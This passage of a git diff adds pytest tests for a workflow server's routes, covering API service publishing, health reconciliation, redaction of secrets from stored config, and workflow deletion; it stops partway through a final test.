diff --git a/tests/server/routes/test_workflow_publish_api.py b/tests/server/routes/test_workflow_publish_api.py
new file mode 100644
index 000000000..8ac6afc40
--- /dev/null
+++ b/tests/server/routes/test_workflow_publish_api.py
@@ -0,0 +1,344 @@
+from __future__ import annotations
+
+from typing import Any
+
+import pytest
+
+from flocks.server.routes import workflow as workflow_routes
+
+
+@pytest.mark.asyncio
+async def test_publish_workflow_as_api_reuses_key_for_runtime(
+    monkeypatch: pytest.MonkeyPatch,
+    tmp_path,
+) -> None:
+    workflow_id = "wf-1"
+    existing_key = "existing-api-key"
+    publish_calls: list[dict[str, Any]] = []
+    writes: dict[str, Any] = {}
+
+    monkeypatch.setattr(
+        workflow_routes,
+        "_read_workflow_from_fs",
+        lambda requested_id: {
+            "id": requested_id,
+            "name": "Demo Workflow",
+            "workflowJson": {
+                "id": requested_id,
+                "start": "n1",
+                "nodes": [{"id": "n1", "type": "python", "code": "outputs['ok'] = True"}],
+                "edges": [],
+            },
+        } if requested_id == workflow_id else None,
+    )
+    monkeypatch.setattr(workflow_routes.Config, "get_data_path", lambda: tmp_path)
+
+    async def fake_read(key: Any, *_args: Any, **_kwargs: Any) -> Any:
+        if str(key) == workflow_routes._api_service_key(workflow_id):
+            return {"apiKey": existing_key}
+        return None
+
+    async def fake_write(key: Any, value: Any) -> None:
+        writes[str(key)] = value
+
+    async def fake_publish_workflow(
+        requested_id: str,
+        image: str | None = None,
+        driver: str | None = None,
+        api_key: str | None = None,
+    ) -> dict[str, Any]:
+        publish_calls.append({
+            "workflow_id": requested_id,
+            "image": image,
+            "driver": driver,
+            "api_key": api_key,
+        })
+        return {
+            "serviceUrl": "http://127.0.0.1:19000",
+            "containerName": "local-wf-1",
+            "driver": driver or "local",
+            "apiKey": api_key,
+        }
+
+    monkeypatch.setattr(workflow_routes.Storage, "read", fake_read)
+    monkeypatch.setattr(workflow_routes.Storage, "write", fake_write)
+    monkeypatch.setattr(workflow_routes, "publish_workflow", fake_publish_workflow)
+
+    result = await workflow_routes.publish_workflow_as_api(
+        workflow_id,
+        workflow_routes.WorkflowCenterPublishRequest(driver="local"),
+    )
+
+    assert publish_calls == [{
+        "workflow_id": workflow_id,
+        "image": None,
+        "driver": "local",
+        "api_key": existing_key,
+    }]
+    assert result["apiKey"] == existing_key
+    assert writes[workflow_routes._api_service_key(workflow_id)]["apiKey"] == existing_key
+
+
+@pytest.mark.asyncio
+async def test_reconcile_published_workflow_api_services_restarts_unhealthy_service(
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    workflow_id = "wf-1"
+    existing_key = "existing-api-key"
+    service_key = workflow_routes._api_service_key(workflow_id)
+    store: dict[str, Any] = {
+        service_key: {
+            "workflowId": workflow_id,
+            "workflowName": "Demo Workflow",
+            "serviceUrl": "http://127.0.0.1:19000",
+            "invokeUrl": "http://127.0.0.1:19000/invoke",
+            "apiKey": existing_key,
+            "status": "running",
+            "driver": "docker",
+            "image": "custom-image:latest",
+        }
+    }
+    publish_calls: list[dict[str, Any]] = []
+
+    async def fake_list_keys(prefix: str) -> list[str]:
+        assert prefix == workflow_routes._API_SERVICE_PREFIX
+        return list(store.keys())
+
+    async def fake_read(key: Any, *_args: Any, **_kwargs: Any) -> Any:
+        return store.get(str(key))
+
+    async def fake_write(key: Any, value: Any) -> None:
+        store[str(key)] = value
+
+    async def fake_health(requested_id: str) -> dict[str, Any]:
+        assert requested_id == workflow_id
+        return {"ok": False, "published": True, "endpointOk": False}
+
+    async def fake_prepare_registry(requested_id: str) -> tuple[dict[str, Any], int]:
+        assert requested_id == workflow_id
+        return {"name": "Demo Workflow"}, 123
+
+    async def fake_publish_workflow(
+        requested_id: str,
+        image: str | None = None,
+        driver: str | None = None,
+        api_key: str | None = None,
+    ) -> dict[str, Any]:
+        publish_calls.append({
+            "workflow_id": requested_id,
+            "image": image,
+            "driver": driver,
+            "api_key": api_key,
+        })
+        return {
+            "serviceUrl": "http://127.0.0.1:19001",
+            "containerName": "flocks-wf-wf-1-rel-1",
+            "driver": driver,
+            "image": image,
+            "apiKey": api_key,
+        }
+
+    monkeypatch.setattr(workflow_routes.Storage, "list_keys", fake_list_keys)
+    monkeypatch.setattr(workflow_routes.Storage, "read", fake_read)
+    monkeypatch.setattr(workflow_routes.Storage, "write", fake_write)
+    monkeypatch.setattr(workflow_routes, "get_workflow_health", fake_health)
+    monkeypatch.setattr(workflow_routes, "_prepare_workflow_api_registry", fake_prepare_registry)
+    monkeypatch.setattr(workflow_routes, "publish_workflow", fake_publish_workflow)
+
+    result = await workflow_routes.reconcile_published_workflow_api_services()
+
+    assert result["checked"] == 1
+    assert result["restarted"] == 1
+    assert publish_calls == [{
+        "workflow_id": workflow_id,
+        "image": "custom-image:latest",
+        "driver": "docker",
+        "api_key": existing_key,
+    }]
+    assert store[service_key]["status"] == "running"
+    assert store[service_key]["apiKey"] == existing_key
+    assert store[service_key]["serviceUrl"] == "http://127.0.0.1:19001"
+    assert store[service_key]["invokeUrl"] == "http://127.0.0.1:19001/invoke"
+
+
+@pytest.mark.asyncio
+async def test_reconcile_published_workflow_api_services_restarts_health_marked_stopped_service(
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    workflow_id = "wf-health-stopped"
+    service_key = workflow_routes._api_service_key(workflow_id)
+    store: dict[str, Any] = {
+        service_key: {
+            "workflowId": workflow_id,
+            "status": "stopped",
+            "apiKey": "existing-api-key",
+        }
+    }
+    publish_calls: list[str] = []
+
+    async def fake_list_keys(prefix: str) -> list[str]:
+        assert prefix == workflow_routes._API_SERVICE_PREFIX
+        return list(store.keys())
+
+    async def fake_read(key: Any, *_args: Any, **_kwargs: Any) -> Any:
+        return store.get(str(key))
+
+    async def fake_write(key: Any, value: Any) -> None:
+        store[str(key)] = value
+
+    async def fake_health(requested_id: str) -> dict[str, Any]:
+        assert requested_id == workflow_id
+        return {"ok": False, "published": False}
+
+    async def fake_prepare_registry(requested_id: str) -> tuple[dict[str, Any], int]:
+        assert requested_id == workflow_id
+        return {"name": "Demo Workflow"}, 123
+
+    async def fake_publish_workflow(
+        requested_id: str,
+        image: str | None = None,
+        driver: str | None = None,
+        api_key: str | None = None,
+    ) -> dict[str, Any]:
+        publish_calls.append(requested_id)
+        return {
+            "serviceUrl": "http://127.0.0.1:19002",
+            "containerName": "local-wf-health-stopped",
+            "driver": driver or "local",
+            "apiKey": api_key,
+        }
+
+    monkeypatch.setattr(workflow_routes.Storage, "list_keys", fake_list_keys)
+    monkeypatch.setattr(workflow_routes.Storage, "read", fake_read)
+    monkeypatch.setattr(workflow_routes.Storage, "write", fake_write)
+    monkeypatch.setattr(workflow_routes, "get_workflow_health", fake_health)
+    monkeypatch.setattr(workflow_routes, "_prepare_workflow_api_registry", fake_prepare_registry)
+    monkeypatch.setattr(workflow_routes, "publish_workflow", fake_publish_workflow)
+
+    result = await workflow_routes.reconcile_published_workflow_api_services()
+
+    assert result["checked"] == 1
+    assert result["restarted"] == 1
+    assert result["skipped"] == 0
+    assert publish_calls == [workflow_id]
+    assert store[service_key]["status"] == "running"
+
+
+@pytest.mark.asyncio
+async def test_reconcile_published_workflow_api_services_skips_manually_stopped_service(
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    workflow_id = "wf-manual-stopped"
+    service_key = workflow_routes._api_service_key(workflow_id)
+    store: dict[str, Any] = {
+        service_key: {
+            "workflowId": workflow_id,
+            "status": "stopped",
+            "stoppedAt": 123,
+            "apiKey": "existing-api-key",
+        }
+    }
+    health_calls: list[str] = []
+
+    async def fake_list_keys(prefix: str) -> list[str]:
+        assert prefix == workflow_routes._API_SERVICE_PREFIX
+        return list(store.keys())
+
+    async def fake_read(key: Any, *_args: Any, **_kwargs: Any) -> Any:
+        return store.get(str(key))
+
+    async def fake_health(requested_id: str) -> dict[str, Any]:
+        health_calls.append(requested_id)
+        return {"ok": True}
+
+    monkeypatch.setattr(workflow_routes.Storage, "list_keys", fake_list_keys)
+    monkeypatch.setattr(workflow_routes.Storage, "read", fake_read)
+    monkeypatch.setattr(workflow_routes, "get_workflow_health", fake_health)
+
+    result = await workflow_routes.reconcile_published_workflow_api_services()
+
+    assert result["skipped"] == 1
+    assert result["checked"] == 0
+    assert health_calls == []
+
+
+@pytest.mark.asyncio
+async def test_get_workflow_service_does_not_probe_runtime_health(
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    workflow_id = "wf-service-read"
+    service = {
+        "workflowId": workflow_id,
+        "status": "running",
+        "serviceUrl": "http://127.0.0.1:19000",
+    }
+    writes: list[Any] = []
+    health_calls: list[str] = []
+
+    async def fake_read(key: Any, *_args: Any, **_kwargs: Any) -> Any:
+        assert str(key) == workflow_routes._api_service_key(workflow_id)
+        return service
+
+    async def fake_write(key: Any, value: Any) -> None:
+        writes.append((key, value))
+
+    async def fake_health(requested_id: str) -> dict[str, Any]:
+        health_calls.append(requested_id)
+        return {"ok": False, "published": False}
+
+    monkeypatch.setattr(workflow_routes.Storage, "read", fake_read)
+    monkeypatch.setattr(workflow_routes.Storage, "write", fake_write)
+    monkeypatch.setattr(workflow_routes, "get_workflow_health", fake_health)
+
+    result = await workflow_routes.get_workflow_service(workflow_id)
+
+    assert result is service
+    assert health_calls == []
+    assert writes == []
+
+
+@pytest.mark.asyncio
+async def test_list_workflow_services_marks_stale_running_service_stopped_in_response(
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    workflow_id = "wf-stale-service"
+    service_key = workflow_routes._api_service_key(workflow_id)
+    service = {
+        "workflowId": workflow_id,
+        "workflowName": "Stale Workflow",
+        "serviceUrl": "http://127.0.0.1:19002",
+        "invokeUrl": "http://127.0.0.1:19002/invoke",
+        "apiKey": "existing-api-key",
+        "status": "running",
+        "publishedAt": 123,
+        "driver": "local",
+    }
+    store: dict[str, Any] = {service_key: service}
+
+    async def fake_list_keys(prefix: str) -> list[str]:
+        assert prefix == workflow_routes._API_SERVICE_PREFIX
+        return [service_key]
+
+    async def fake_read(key: Any, *_args: Any, **_kwargs: Any) -> Any:
+        return store.get(str(key))
+
+    writes: list[tuple[Any, Any]] = []
+
+    async def fake_write(key: Any, value: Any) -> None:
+        writes.append((key, value))
+
+    monkeypatch.setattr(workflow_routes.Storage, "list_keys", fake_list_keys)
+    monkeypatch.setattr(workflow_routes.Storage, "read", fake_read)
+    monkeypatch.setattr(workflow_routes.Storage, "write", fake_write)
+
+    result = await workflow_routes.list_workflow_services()
+
+    assert result[0]["status"] == "stopped"
+    assert result[0]["health"] == {
+        "ok": False,
+        "stale": True,
+        "reason": "missing_runtime",
+    }
+    assert "stoppedAt" not in result[0]
+    assert store[service_key]["status"] == "running"
+    assert writes == []
diff --git a/tests/server/routes/test_workflow_routes_visibility.py b/tests/server/routes/test_workflow_routes_visibility.py
new file mode 100644
index 000000000..0773c329b
--- /dev/null
+++ b/tests/server/routes/test_workflow_routes_visibility.py
@@ -0,0 +1,55 @@
+from __future__ import annotations
+
+import json
+from pathlib import Path
+
+import pytest
+
+from flocks.server.routes import workflow as workflow_routes
+
+
+def _write_workflow(
+    root: Path,
+    workflow_id: str,
+    *,
+    name: str,
+    meta: dict | None = None,
+) -> None:
+    workflow_dir = root / workflow_id
+    workflow_dir.mkdir(parents=True, exist_ok=True)
+    (workflow_dir / "workflow.json").write_text(
+        json.dumps(
+            {
+                "name": name,
+                "start": "n1",
+                "nodes": [{"id": "n1", "type": "python", "code": "outputs['ok'] = True"}],
+                "edges": [],
+            }
+        ),
+        encoding="utf-8",
+    )
+    if meta is not None:
+        (workflow_dir / "meta.json").write_text(json.dumps(meta), encoding="utf-8")
+
+
+def test_list_workflows_from_fs_skips_hidden_templates(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    workflow_root = tmp_path / ".flocks" / "plugins" / "workflows"
+    _write_workflow(workflow_root, "visible", name="visible")
+    _write_workflow(
+        workflow_root,
+        "__hidden_template",
+        name="hidden template",
+        meta={"hidden": True, "templateOnly": True},
+    )
+    monkeypatch.setattr(
+        workflow_routes,
+        "_all_scan_dirs",
+        lambda: [(workflow_root, "project")],
+    )
+
+    items = workflow_routes._list_workflows_from_fs()
+
+    assert [item["id"] for item in items] == ["visible"]
diff --git a/tests/server/routes/test_workflow_trigger_routes.py b/tests/server/routes/test_workflow_trigger_routes.py
index 845100e51..f183f6e0d 100644
--- a/tests/server/routes/test_workflow_trigger_routes.py
+++ b/tests/server/routes/test_workflow_trigger_routes.py
@@ -1,5 +1,7 @@
 from __future__ import annotations
 
+import json
+from pathlib import Path
 from types import SimpleNamespace
 from typing import Any
 
@@ -7,6 +9,7 @@
 from httpx import AsyncClient
 
 from flocks.server.routes import workflow as workflow_routes
+from flocks.workflow import fs_store
 
 
 @pytest.mark.asyncio
@@ -106,6 +109,452 @@ async def _fake_statuses(_workflow_id: str, _workflow_json: dict[str, Any]) -> l
     assert response.json() == []
 
 
+@pytest.mark.asyncio
+async def test_workflow_config_response_keeps_template_separate_from_runtime(
+    client: AsyncClient,
+    monkeypatch: pytest.MonkeyPatch,
+    tmp_path: Path,
+) -> None:
+    config_dir = tmp_path / "wf-1"
+    config_dir.mkdir()
+    (config_dir / "config.json").write_text(
+        json.dumps(
+            {
+                "version": 1,
+                "kind": "workflow.integration-config",
+                "workflow": {"id": "wf-1"},
+                "triggers": [
+                    {
+                        "id": "syslog-default",
+                        "type": "syslog",
+                        "enabled": False,
+                    },
+                    {
+                        "id": "api-default",
+                        "type": "api",
+                        "enabled": True,
+                    },
+                ],
+            }
+        ),
+        encoding="utf-8",
+    )
+
+    monkeypatch.setattr(
+        workflow_routes,
+        "_workflow_config_dir",
+        lambda _workflow_id, _workflow_data=None: config_dir,
+    )
+    monkeypatch.setattr(
+        workflow_routes,
+        "_read_workflow_from_fs",
+        lambda workflow_id: {
+            "id": workflow_id,
+            "name": "demo",
+            "workflowJson": {
+                "start": "n1",
+                "nodes": [{"id": "n1", "type": "python", "code": "result = {'ok': True}"}],
+                "edges": [],
+                "triggers": [
+                    {
+                        "id": "syslog-default",
+                        "type": "syslog",
+                        "enabled": True,
+                    }
+                ],
+            },
+        } if workflow_id == "wf-1" else None,
+    )
+
+    stored_writes: dict[str, Any] = {}
+
+    async def _fake_read(key: Any, _model: Any = None) -> dict[str, Any] | None:
+        if key == workflow_routes._api_service_key("wf-1"):
+            return {
+                "workflowId": "wf-1",
+                "status": "stopped",
+                "driver": "local",
+            }
+        return None
+
+    async def _fake_write(key: Any, value: Any) -> None:
+        stored_writes[str(key)] = value
+
+    async def _fake_statuses(_workflow_id: str, _workflow_json: dict[str, Any]) -> list[dict[str, Any]]:
+        return [
+            {
+                "workflowId": "wf-1",
+                "triggerId": "syslog-default",
+                "triggerType": "syslog",
+                "state": "listening",
+            }
+        ]
+
+    monkeypatch.setattr(workflow_routes.Storage, "read", _fake_read)
+    monkeypatch.setattr(workflow_routes.Storage, "write", _fake_write)
+    monkeypatch.setattr(
+        workflow_routes,
+        "default_trigger_runtime",
+        SimpleNamespace(get_workflow_trigger_statuses=_fake_statuses),
+    )
+
+    response = await client.get("/api/workflow/wf-1/config")
+
+    assert response.status_code == 200, response.text
+    body = response.json()
+    assert body["exists"] is True
+    assert body["source"] == "file_migrated"
+    assert stored_writes[workflow_routes._workflow_integration_config_key("wf-1")] == body["config"]
+    assert body["config"]["triggers"][0]["enabled"] is False
+    assert body["config"]["triggers"][1]["type"] == "api"
+    assert body["runtime"]["publish"]["status"] == "stopped"
+    assert body["runtime"]["publish"]["enabled"] is False
+    assert body["runtime"]["triggers"][0]["trigger"]["enabled"] is True
+    assert body["runtime"]["triggers"][0]["status"]["state"] == "listening"
+
+
+@pytest.mark.asyncio
+async def test_workflow_config_prefers_storage_over_config_file(
+    client: AsyncClient,
+    monkeypatch: pytest.MonkeyPatch,
+    tmp_path: Path,
+) -> None:
+    config_dir = tmp_path / "wf-1"
+    config_dir.mkdir()
+    (config_dir / "config.json").write_text(
+        json.dumps(
+            {
+                "version": 1,
+                "kind": "workflow.integration-config",
+                "workflow": {"id": "wf-1"},
+                "triggers": [{"id": "file-syslog", "type": "syslog", "enabled": True}],
+            }
+        ),
+        encoding="utf-8",
+    )
+
+    stored_config = {
+        "version": 1,
+        "kind": "workflow.integration-config",
+        "workflow": {"id": "wf-1"},
+        "updatedAt": 1,
+        "publish": {"type": "api_service"},
+        "triggers": [{"id": "storage-api", "type": "api", "enabled": True}],
+    }
+    write_calls: list[tuple[Any, Any]] = []
+
+    monkeypatch.setattr(
+        workflow_routes,
+        "_workflow_config_dir",
+        lambda _workflow_id, _workflow_data=None: config_dir,
+    )
+    monkeypatch.setattr(
+        workflow_routes,
+        "_read_workflow_from_fs",
+        lambda workflow_id: {
+            "id": workflow_id,
+            "name": "demo",
+            "workflowJson": {"start": "n1", "nodes": [], "edges": [], "triggers": []},
+        } if workflow_id == "wf-1" else None,
+    )
+
+    async def _fake_read(key: Any, _model: Any = None) -> dict[str, Any] | None:
+        if key == workflow_routes._workflow_integration_config_key("wf-1"):
+            return stored_config
+        return None
+
+    async def _fake_write(key: Any, value: Any) -> None:
+        write_calls.append((key, value))
+
+    async def _fake_statuses(_workflow_id: str, _workflow_json: dict[str, Any]) -> list[dict[str, Any]]:
+        return []
+
+    monkeypatch.setattr(workflow_routes.Storage, "read", _fake_read)
+    monkeypatch.setattr(workflow_routes.Storage, "write", _fake_write)
+    monkeypatch.setattr(
+        workflow_routes,
+        "default_trigger_runtime",
+        SimpleNamespace(get_workflow_trigger_statuses=_fake_statuses),
+    )
+
+    response = await client.get("/api/workflow/wf-1/config")
+
+    assert response.status_code == 200, response.text
+    body = response.json()
+    assert body["source"] == "storage"
+    assert body["config"]["triggers"] == [{"id": "storage-api", "type": "api", "enabled": True}]
+    assert all(key != workflow_routes._workflow_integration_config_key("wf-1") for key, _value in write_calls)
+
+
+@pytest.mark.asyncio
+async def test_update_workflow_config_writes_template_without_mutating_runtime(
+    client: AsyncClient,
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    workspace = tmp_path / "workspace"
+    workflow_id = "wf-1"
+    workflow_dir = workspace / ".flocks" / "plugins" / "workflows" / workflow_id
+    workflow_dir.mkdir(parents=True)
+    (workflow_dir / "workflow.json").write_text(
+        json.dumps(
+            {
+                "start": "n1",
+                "nodes": [{"id": "n1", "type": "python", "code": "result = {'ok': True}"}],
+                "edges": [],
+                "triggers": [{"id": "syslog-default", "type": "syslog", "enabled": True}],
+            }
+        ),
+        encoding="utf-8",
+    )
+    (workflow_dir / "meta.json").write_text(
+        json.dumps(
+            {
+                "name": "Demo Workflow",
+                "category": "default",
+                "source": "project",
+                "status": "draft",
+                "createdAt": 1,
+                "updatedAt": 1,
+            }
+        ),
+        encoding="utf-8",
+    )
+    monkeypatch.chdir(workspace)
+    monkeypatch.setattr(fs_store, "_workspace_root", None)
+
+    original_storage_read = workflow_routes.Storage.read
+    stored_writes: dict[str, Any] = {}
+
+    async def _fake_storage_read(key: Any, *args: Any, **kwargs: Any) -> Any:
+        if key == workflow_routes._api_service_key(workflow_id):
+            return {
+                "workflowId": workflow_id,
+                "workflowName": "Demo Workflow",
+                "serviceUrl": "http://127.0.0.1:19000",
+                "invokeUrl": "http://127.0.0.1:19000/invoke",
+                "apiKey": "runtime-secret",
+                "status": "running",
+                "driver": "local",
+                "publishedAt": 123,
+            }
+        return await original_storage_read(key, *args, **kwargs)
+
+    async def _fake_storage_write(key: Any, value: Any) -> None:
+        stored_writes[str(key)] = value
+
+    async def _fake_statuses(_workflow_id: str, _workflow_json: dict[str, Any]) -> list[dict[str, Any]]:
+        return [
+            {
+                "workflowId": workflow_id,
+                "triggerId": "syslog-default",
+                "triggerType": "syslog",
+                "state": "listening",
+            }
+        ]
+
+    monkeypatch.setattr(workflow_routes.Storage, "read", _fake_storage_read)
+    monkeypatch.setattr(workflow_routes.Storage, "write", _fake_storage_write)
+    monkeypatch.setattr(
+        workflow_routes,
+        "default_trigger_runtime",
+        SimpleNamespace(get_workflow_trigger_statuses=_fake_statuses),
+    )
+
+    response = await client.put(
+        f"/api/workflow/{workflow_id}/config",
+        json={
+            "version": 1,
+            "kind": "workflow.integration-config",
+            "workflow": {"id": workflow_id},
+            "runtime": {"publish": {"enabled": False}},
+            "publish": {
+                "type": "api_service",
+                "enabled": False,
+                "apiKey": "template-secret",
+            },
+            "triggers": [
+                {
+                    "id": "api-default",
+                    "type": "api",
+                    "source": {
+                        "method": "POST",
+                        "path": f"/api/workflow/{workflow_id}/run",
+                        "client_secret": "nested-secret",
+                        "secretRef": "workflow/api-key",
+                    },
+                },
+                {
+                    "id": "syslog-default",
+                    "type": "syslog",
+                    "enabled": False,
+                },
+            ],
+        },
+    )
+
+    assert response.status_code == 200, response.text
+    body = response.json()
+    config_path = workflow_dir / "config.json"
+    assert body["path"] == str(config_path)
+    assert body["source"] == "storage"
+    assert not config_path.exists()
+    written = stored_writes[workflow_routes._workflow_integration_config_key(workflow_id)]
+    assert written == body["config"]
+    assert "runtime" not in written
+    assert written["workflow"]["id"] == workflow_id
+    assert written["workflow"]["name"] == "Demo Workflow"
+    assert written["publish"]["enabled"] is False
+    assert written["publish"]["apiKeyConfigured"] is True
+    assert "apiKey" not in written["publish"]
+    assert written["triggers"][0]["type"] == "api"
+    assert written["triggers"][0]["source"]["client_secretConfigured"] is True
+    assert written["triggers"][0]["source"]["secretRef"] == "workflow/api-key"
+    assert "client_secret" not in written["triggers"][0]["source"]
+    assert body["runtime"]["publish"]["enabled"] is True
+    assert body["runtime"]["publish"]["apiKeyConfigured"] is True
+    assert body["runtime"]["triggers"][0]["status"]["state"] == "listening"
+
+
+@pytest.mark.asyncio
+async def test_delete_workflow_service_removes_runtime_service_record(
+    client: AsyncClient,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    workflow_id = "wf-service-delete"
+    await workflow_routes.Storage.write(
+        workflow_routes._api_service_key(workflow_id),
+        {
+            "workflowId": workflow_id,
+            "workflowName": "Demo Workflow",
+            "serviceUrl": "http://127.0.0.1:19000",
+            "invokeUrl": "http://127.0.0.1:19000/invoke",
+            "apiKey": "runtime-secret",
+            "status": "running",
+            "driver": "local",
+            "publishedAt": 123,
+        },
+    )
+    stopped: list[str] = []
+
+    async def _fake_stop_service(wid: str) -> dict[str, Any]:
+        stopped.append(wid)
+        return {"workflowId": wid, "status": "stopped"}
+
+    monkeypatch.setattr(workflow_routes, "stop_workflow_service", _fake_stop_service)
+
+    response = await client.delete(f"/api/workflow/{workflow_id}/service")
+
+    assert response.status_code == 200, response.text
+    assert response.json() == {"ok": True, "workflowId": workflow_id}
+    assert stopped == [workflow_id]
+    assert await workflow_routes.Storage.read(workflow_routes._api_service_key(workflow_id)) is None
+
+
+@pytest.mark.asyncio
+async def test_update_workflow_config_rejects_mismatched_workflow_id(
+    client: AsyncClient,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    monkeypatch.setattr(
+        workflow_routes,
+        "_read_workflow_from_fs",
+        lambda workflow_id: {
+            "id": workflow_id,
+            "name": "demo",
+            "workflowJson": {"start": "n1", "nodes": [], "edges": []},
+        } if workflow_id == "wf-1" else None,
+    )
+
+    response = await client.put(
+        "/api/workflow/wf-1/config",
+        json={
+            "version": 1,
+            "kind": "workflow.integration-config",
+            "workflow": {"id": "other-workflow"},
+            "publish": {},
+            "triggers": [],
+        },
+    )
+
+    assert response.status_code == 409, response.text
+    assert "does not match" in response.json()["message"]
+
+
+@pytest.mark.asyncio
+async def test_delete_workflow_cleans_directory_and_storage(
+    client: AsyncClient,
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    workspace = tmp_path / "workspace"
+    workflow_id = "wf-delete"
+    workflow_dir = workspace / ".flocks" / "plugins" / "workflows" / workflow_id
+    workflow_dir.mkdir(parents=True)
+    (workflow_dir / "workflow.json").write_text(
+        json.dumps({"start": "n1", "nodes": [], "edges": []}),
+        encoding="utf-8",
+    )
+    (workflow_dir / "meta.json").write_text(
+        json.dumps({"name": "Delete Me", "category": "default", "status": "draft"}),
+        encoding="utf-8",
+    )
+    service_dir = workflow_routes.Config.get_data_path() / "workflow-services" / "workflows" / workflow_id
+    service_dir.mkdir(parents=True)
+    (service_dir / "snapshot.json").write_text("{}", encoding="utf-8")
+
+    monkeypatch.chdir(workspace)
+    monkeypatch.setattr(fs_store, "_workspace_root", None)
+
+    storage_keys = [
+        workflow_routes._workflow_stats_key(workflow_id),
+        workflow_routes._workflow_integration_config_key(workflow_id),
+        workflow_routes._api_service_key(workflow_id),
+        workflow_routes._syslog_config_key(workflow_id),
+        workflow_routes._kafka_config_key(workflow_id),
+        f"workflow_poller_config/{workflow_id}",
+        f"workflow_registry/{workflow_id}",
+        f"workflow_runtime/{workflow_id}",
+        f"workflow_local_pid/{workflow_id}",
+        f"workflow_release/{workflow_id}/active",
+        f"workflow_release/{workflow_id}/rel-1",
+        workflow_routes._workflow_execution_key("exec-delete"),
+    ]
+    for key in storage_keys:
+        payload = {"workflowId": workflow_id}
+        if key == workflow_routes._workflow_execution_key("exec-delete"):
+            payload = {"id": "exec-delete", "workflowId": workflow_id}
+        await workflow_routes.Storage.write(key, payload)
+
+    stopped: list[Any] = []
+
+    async def _fake_stop_service(wid: str) -> dict[str, Any]:
+        stopped.append(("service", wid))
+        return {"workflowId": wid, "status": "stopped"}
+
+    async def _fake_restart_workflow(wid: str, workflow_json: dict[str, Any]) -> dict[str, Any]:
+        stopped.append(("triggers", wid, workflow_json))
+        return {"syslog": {"state": "stopped"}}
+
+    monkeypatch.setattr(workflow_routes, "stop_workflow_service", _fake_stop_service)
+    monkeypatch.setattr(
+        workflow_routes,
+        "default_trigger_runtime",
+        SimpleNamespace(restart_workflow=_fake_restart_workflow),
+    )
+
+    response = await client.delete(f"/api/workflow/{workflow_id}")
+
+    assert response.status_code == 204, response.text
+    assert not workflow_dir.exists()
+    assert not service_dir.exists()
+    assert ("service", workflow_id) in stopped
+    assert ("triggers", workflow_id, {"triggers": []}) in stopped
+    for key in storage_keys:
+        assert await workflow_routes.Storage.read(key) is None
+    assert await workflow_routes.Storage.list(f"workflow_release/{workflow_id}/") == []
+
+
 @pytest.mark.asyncio
 async def test_preview_trigger_mapping_returns_mapped_inputs(
     client: AsyncClient,
@@ -482,3 +931,201 @@ async def _fake_dispatch_event(**_kwargs: Any) -> dict[str, Any]:
         content=payload,
     )
     assert bad_response.status_code == 401, bad_response.text
+
+
+@pytest.mark.asyncio
+async def test_sync_workflow_config_writes_publish_and_trigger_capabilities(
+    client: AsyncClient,
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    workspace = tmp_path / "workspace"
+    workflow_id = "wf-1"
+    workflow_dir = workspace / ".flocks" / "plugins" / "workflows" / workflow_id
+    workflow_dir.mkdir(parents=True)
+    (workflow_dir / "workflow.json").write_text(
+        json.dumps(
+            {
+                "start": "n1",
+                "nodes": [{"id": "n1", "type": "python", "code": "result = {'ok': True}"}],
+                "edges": [],
+                "triggers": [
+                    {
+                        "id": "hook-default",
+                        "type": "custom_webhook",
+                        "enabled": True,
+                        "source": {"method": "POST"},
+                        "auth": {"type": "api_key", "apiKey": "demo-secret"},
+                        "mapping": {"payload": "$.body"},
+                    }
+                ],
+            }
+        ),
+        encoding="utf-8",
+    )
+    (workflow_dir / "meta.json").write_text(
+        json.dumps(
+            {
+                "name": "Demo Workflow",
+                "description": None,
+                "category": "default",
+                "status": "draft",
+                "createdBy": None,
+                "createdAt": 1,
+                "updatedAt": 1,
+            }
+        ),
+        encoding="utf-8",
+    )
+    monkeypatch.chdir(workspace)
+    monkeypatch.setattr(fs_store, "_workspace_root", None)
+
+    original_storage_read = workflow_routes.Storage.read
+    stored_writes: dict[str, Any] = {}
+
+    async def _fake_storage_read(key: Any, *args: Any, **kwargs: Any) -> Any:
+        if key == workflow_routes._api_service_key(workflow_id):
+            return {
+                "workflowId": workflow_id,
+                "workflowName": "Demo Workflow",
+                "serviceUrl": "http://127.0.0.1:19000",
+                "invokeUrl": "http://127.0.0.1:19000/invoke",
+                "apiKey": "service-secret",
+                "status": "running",
+                "driver": "local",
+                "publishedAt": 123,
+            }
+        return await original_storage_read(key, *args, **kwargs)
+
+    async def _fake_storage_write(key: Any, value: Any) -> None:
+        stored_writes[str(key)] = value
+
+    monkeypatch.setattr(workflow_routes.Storage, "read", _fake_storage_read)
+    monkeypatch.setattr(workflow_routes.Storage, "write", _fake_storage_write)
+
+    response = await client.post(f"/api/workflow/{workflow_id}/config/sync")
+
+    assert response.status_code == 200, response.text
+    config_path = workflow_dir / "config.json"
+    assert response.json()["path"] == str(config_path)
+    assert response.json()["source"] == "storage"
+    assert not config_path.exists()
+    config = stored_writes[workflow_routes._workflow_integration_config_key(workflow_id)]
+    assert response.json()["config"] == config
+    assert config["kind"] == "workflow.integration-config"
+    assert config["publish"]["enabled"] is True
+    assert config["publish"]["apiKeyConfigured"] is True
+    assert "apiKey" not in config["publish"]
+    assert config["triggers"][0]["invoke"]["path"] == "/webhook/workflows/wf-1/hook-default"
+    assert config["triggers"][0]["auth"]["apiKeyConfigured"] is True
+    assert "apiKey" not in config["triggers"][0]["auth"]
+
+
+@pytest.mark.asyncio
+async def test_persist_workflow_triggers_does_not_overwrite_config_template(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    workspace = tmp_path / "workspace"
+    workflow_id = "wf-1"
+    workflow_dir = workspace / ".flocks" / "plugins" / "workflows" / workflow_id
+    workflow_dir.mkdir(parents=True)
+    config_path = workflow_dir / "config.json"
+    config_path.write_text(
+        json.dumps(
+            {
+                "version": 1,
+                "kind": "workflow.integration-config",
